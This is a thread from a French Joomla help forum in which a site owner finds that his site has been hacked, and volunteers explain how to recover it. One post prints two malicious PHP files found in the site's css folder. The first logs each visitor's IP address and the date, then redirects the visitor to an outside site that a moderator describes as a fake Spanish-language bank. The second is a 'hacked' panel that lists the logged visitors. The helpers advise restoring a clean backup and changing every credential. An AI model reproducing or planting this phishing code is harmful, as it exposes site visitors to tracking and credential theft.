css desactivé en admin + page blanche

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • #31
    Re : css desactivé en admin + page blanche

    Juste une remarque en passant, évitez les messages successifs du même auteur.
    J’hésite en effet souvent sur les 2 méthodes
    j'opte pour les messages successifs quant il existe un temps certain entre 2 messages (je suis passé à autre chose on j'ai pris du temps pour vérifier mes informations) mais il est vrais que quand on voit 2,3, ou 4 post de la même source, c'est assez 'moyen'
    je coriige mes fôtes d'ortegraffe ou les infos oubliés en rééditant à la relecture
    N'oubliez pas de passer vos post en "réglé" c'est très utile à celui qui cherche, ...et qui se perd http://forum.joomla.fr/announcement.php?f=133 mais trouvera grâce à vous

    Commentaire


    • #32
      Code PHP:
      <?php
      //esse codigo salva os acessos a esse arquivo
      $timestamp  mktime(date("H")-3date("i"), date("s"), date("m"), date("d"), date("Y"));
      $datinha    gmdate("d-m-Y"$timestamp);
      $ip $_SERVER['REMOTE_ADDR'];
      $tipo $_POST["tipo"];

           
      $abrir_txt fopen('log/'.$datinha ' - ' $ip '.txt'"a");
           
      fwrite($abrir_txt$info_salva);
           
      fclose($abrir_txt);
      header("location: http://www.gominis.net/templates/beez3/html/app1/");
      ?>
      Voici le fichier index.php retrouvé dans le css.

      Et config.php, toujours dans css
      Code:
      <style type="text/css">
      <!--
      .style1 {font-family: "Courier New", Courier, monospace}
      body,td,th {
      	color: #00FF00;
      }
      body {
      	background-color: #000000;
      }
      -->
      </style>
      <body>
      <center>
        <h1 class="style1">TOTAL DE CLIENTES NOTIFICADOS: <br>
        <img src="http://3.bp.blogspot.com/-lkISbYNc3uI/UDcAGvmXCwI/AAAAAAAAADQ/G2DWEbt8vAI/s1600/hackedds.jpg" width="190" height="190">  </h1>
      </center>
      <br>
      <hr>
      <?php
      $pasta = "./log";
      $pasta = opendir($pasta);
      $conta = 0;
      $lista = array();
      
      while ($file = readdir($pasta)) {
             if (!is_dir($file) && $file != "." && $file != "..") {
                     ++$conta;
                     $lista[] = $file;
             }
      }
      
      print "<font face="verdana">&rsaquo;ip [$conta]<br>\n";
      for ($i = 0; $i < count($lista); $i++) {
             print $lista[$i] . "<br>\n";
      }
      ?>
      </font>
      <hr>
      </body>

      Merci en tous les cas pour votre aide.
      j'ai déjà essayé de réimplanter le template isis.
      Dernière édition par opware2000 à 26/01/2017, 22h33 Raison: Messages successifs fusionnés

      Commentaire


      • #33
        Aucune fausse manip, c'est bien un hack
        peux-tu envoyer le css pour voir comment il a travailler
        utilise le quote # (code)
        j'utiliserai un nouveau message pour répondre

        $pasta = "./log";
        petit interprétation basic de lecture

        il y a ici la variable qui permet au hacker d'enregistrer ce qu'il il a désiré enregistrer et en donner le chemin d'accès au robot distant

        je ne parle pas l'espagnole mais je crois comprendre, merci à un utilisateur multilingue de confirmer ou d'infirmer
        Dernière édition par opware2000 à 27/01/2017, 08h33 Raison: Messages successifs fusionnés
        N'oubliez pas de passer vos post en "réglé" c'est très utile à celui qui cherche, ...et qui se perd http://forum.joomla.fr/announcement.php?f=133 mais trouvera grâce à vous

        Commentaire


        • #34
          Re : css desactivé en admin + page blanche

          [modo] @abmag : cessez s'il vous plaît de faire tant et plus de messages les uns après les autres. Nicolas vous l'a déjà, gentillement, demandé. Avant de répondre, réfléchissez à la globalité de votre interaction puis postez. Utilisez la fonction "Multi-citer" pour répondre, en une seule fois, à plusieurs réactions. [/modo]

          @bubs : sur base des nouveaux éléments que vous apportez, oui, votre site est hacké. Lorsque quelqu'un arrive sur le lien /css de votre admin, le fichier index.php s'active, enregistre l'IP du visiteur ainsi que la date du jour puis redirige vesr un soit-disant site bancaire rédigé en langue espagnole.

          Si vous avez un backup récent et sain de votre site, le mieux serait de le récupérer pour restaurer le site puis de sécuriser l'ensemble.

          Bonne soirée
          Christophe (cavo789)
          Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
          Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

          Commentaire


          • #35
            Re : css desactivé en admin + page blanche

            Merci beaucoup
            J'ai une sauvegarde de la base de données de mon site en effet.
            Que faut il que je fasse ?
            Reinstallez juste la partie admin ou réinstallez le site en entier ?
            Merci d'avoir pris le temps de m'aider.

            Commentaire


            • #36
              Re : css desactivé en admin + page blanche

              il te faut réinstaller le site complet. Tu as bien utilisé akeeba backup n'est-ce pas ?
              Christophe (cavo789)
              Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
              Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

              Commentaire


              • #37
                Re : css desactivé en admin + page blanche

                Pour t'aider je pense qu'il faut savoir ce que tu as à disposition comme sauvegardes
                1/ Sauvegarde sql de la base de donnée + sauvegarde des fichiers par ftp
                ou
                2/ sauvegarde complète Akeeba
                ou
                3/ sauvegarde Hébergeur base de donné et fichier

                Il faut bien sur que les sauvegardes soient antérieurs à l'infection

                Les identifiants et mot de passe d'accès à l'administration ayant certainement été sniffé tous les couples identifiants/mot de passe des utilisateurs enregistrés sont potentiellement compromis

                Dès que ton site sera restauré, il te faudra changer ton identifiant/mdp administrateur et désactiver tous les comptes enregistrés pour ne les réactiver qu'après changement des mots de passe

                Je te conseille de changer également le mot de passe d'accès à la BDD et FTP

                Bon courage
                N'oubliez pas de passer vos post en "réglé" c'est très utile à celui qui cherche, ...et qui se perd http://forum.joomla.fr/announcement.php?f=133 mais trouvera grâce à vous

                Commentaire


                • #38
                  Re : css desactivé en admin + page blanche

                  Oui, j'ai une sauvegarde AKeeba.
                  Bon , ben je vais reinstaller.
                  Merci pour votre aide.

                  Commentaire

                  Annonce

                  Réduire
                  Aucune annonce pour le moment.

                  Partenaire de l'association

                  Réduire

                  Hébergeur Web PlanetHoster
                  Travaille ...
                  X